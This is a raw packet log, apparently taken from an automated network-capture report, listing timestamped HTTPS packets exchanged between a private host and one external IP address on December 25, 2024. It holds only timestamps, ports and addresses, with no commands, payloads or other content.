                                                                                                                                          Dec 25, 2024 22:17:42.832820892 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.832834959 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.836700916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836714983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836761951 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.836771011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.836811066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840164900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840179920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840223074 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840230942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.840256929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.840280056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844317913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844336987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844371080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844413042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.844419003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:42.844464064 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:42.845997095 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009737015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009756088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009835005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009860039 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.009875059 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.009912968 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013843060 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013864994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013900042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013910055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.013945103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.013956070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017328024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017352104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017391920 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017400980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.017429113 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.017443895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021488905 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021506071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021544933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021574020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.021591902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.021616936 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.024955034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.024974108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.025012016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.025019884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.025054932 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.025072098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.028348923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028367043 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028414965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.028424025 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.028476000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032568932 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032584906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032618046 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032624006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.032660961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.032680035 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.036587000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036602020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036643982 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.036652088 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.036698103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.201994896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.202012062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.202049017 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.202064037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.202079058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.202096939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.206235886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.206253052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.206319094 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.206326962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.206360102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.209630966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.209647894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.209707022 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.209714890 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.209753990 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.213738918 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.213757038 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.213819981 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.213826895 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.213865995 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.217250109 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.217267990 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.217328072 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.217334986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.217376947 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.221400023 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.221417904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.221476078 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.221483946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.221522093 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.224878073 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.224894047 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.224951029 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.224957943 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.225007057 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.229022026 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.229038000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.229110956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.229118109 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.229161024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.394932032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.394949913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.395297050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.395317078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.395382881 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.398289919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.398304939 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.398366928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.398375034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.398417950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.402434111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.402450085 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.402508974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.402517080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.402555943 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.405913115 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.405930042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.405993938 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.406002045 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.406040907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.410074949 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.410092115 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.410156965 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.410165071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.413542032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.413563967 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.413625002 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.413635015 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.413664103 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.413691044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.416908979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.416923046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.417006016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.417013884 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.417943954 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.421240091 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.421262980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.421350956 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.421359062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.421899080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.586808920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.586827040 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.587018013 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.587054014 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.590125084 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.590996027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.591012001 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.591062069 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.591078997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.591104984 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.591129065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.594479084 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.594495058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.594543934 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.594552994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.594578981 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.594599009 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.598615885 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.598633051 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.598692894 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.598702908 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.601953983 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.602063894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.602080107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.602133036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.602148056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.606183052 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.606229067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.606245041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.606303930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.606317997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.609688997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.609708071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.609746933 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.609756947 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.609772921 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.609819889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.613678932 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.613694906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.613765001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.613773108 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.613817930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.779999018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.780019999 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.780076981 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.780092955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.781816006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.783405066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.783420086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.783472061 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.783483982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.785856009 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.786792994 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.786808014 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.786864042 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.786874056 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.790091038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.791024923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.791039944 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.791086912 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.791095018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.794322014 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.794440985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.794456959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.794504881 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.794513941 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.797797918 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.798705101 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.798721075 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.798768997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.798778057 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.801953077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.802171946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.802191019 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.802239895 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.802256107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.806050062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.806070089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.806111097 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.806121111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.806139946 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.806170940 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.971926928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.971946955 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.972121000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.972147942 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.973900080 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.975392103 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.975408077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.975472927 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.975481033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.977822065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.979572058 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.979588032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.979648113 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.979655981 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.981965065 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.982958078 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.982973099 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.983045101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.983056068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.985971928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.987077951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.987093925 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.987152100 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.987160921 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.989857912 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.990561008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.990576982 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.990653038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.990660906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.993841887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.994738102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.994755983 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.994832039 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.994839907 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.997875929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.998692989 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.998709917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:43.998773098 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:43.998780966 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.001832008 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.166316986 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166335106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166412115 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.166441917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.166536093 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.169899940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.169914961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.169977903 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.169987917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.170089960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.174042940 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174058914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174130917 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.174140930 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.174211979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.177385092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177403927 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177462101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.177476883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.177562952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.181541920 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181559086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181628942 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.181638002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.181870937 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.185091972 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185111046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185180902 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.185189962 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.185266972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.189305067 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189321041 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189388990 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.189397097 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.189480066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.193123102 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.193137884 CET44349744172.67.214.186192.168.2.4
